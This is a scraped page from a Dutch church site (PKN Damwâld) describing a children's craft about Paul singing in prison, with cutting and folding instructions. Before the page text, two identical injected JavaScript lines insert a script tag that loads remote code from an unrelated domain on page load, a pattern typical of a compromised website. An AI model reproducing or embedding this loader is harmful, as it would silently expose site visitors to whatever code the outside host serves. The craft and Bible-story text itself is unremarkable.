;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bernetjerkse, Kerk School en Gezin, God wijst de weg aan Paulus - PKN Damwâld

Bernetjerkse, Kerk School en Gezin, God wijst de weg aan Paulus

Gepubliceerd op: woensdag 6 januari 2021

Zondag 10 januari 2021 knutselwerkje

God wijst de weg aan Paulus.

In het filmpje dat getoond werd in de dienst van 10 januari ging het over Paulus in de gevangenis. Paulus ging niet huilen in de gevangenis of mopperen, hij werd ook niet boos, maar hij ging bidden en zingen. Midden in de nacht was Paulus aan het zingen. Iedereen kon het horen, de andere gevangenen luisterden ernaar en wat gebeurde er? God liet Zijn grootheid en almacht zien aan iedereen die daar was. Er kwam een aardschok, de hele gevangenis trilde ervan en de boeien schoten los en de deuren gingen open. Eigenlijk kon iedereen dus vluchten, maar ze deden het niet.

Het knutselwerkje is vrij eenvoudig te maken. Ten eerste natuurlijk de platen inkleuren. In het midden van de grote gevangenisdeuren loopt een grijze lijn, knip deze lijn in en knip vervolgens links en rechts door tot aan de stippellijn aan de zijkanten van de deuren. Let op: Knip de stippellijnen niet in, want daar moet je de deuren vouwen zodat ze open komen te staan.

Aan de zijkanten van de kleurplaten zitten plakstroken. Vouw de plakstroken naar achteren en lijm ze vervolgens achter de zijkanten van de muur. Zo komt de achtergrond rond te staan.

Met de onderstaande link kun je het knutselwerkje downloaden en uitprinten.

Veel plezier.

Knutselwerkje over paulussilas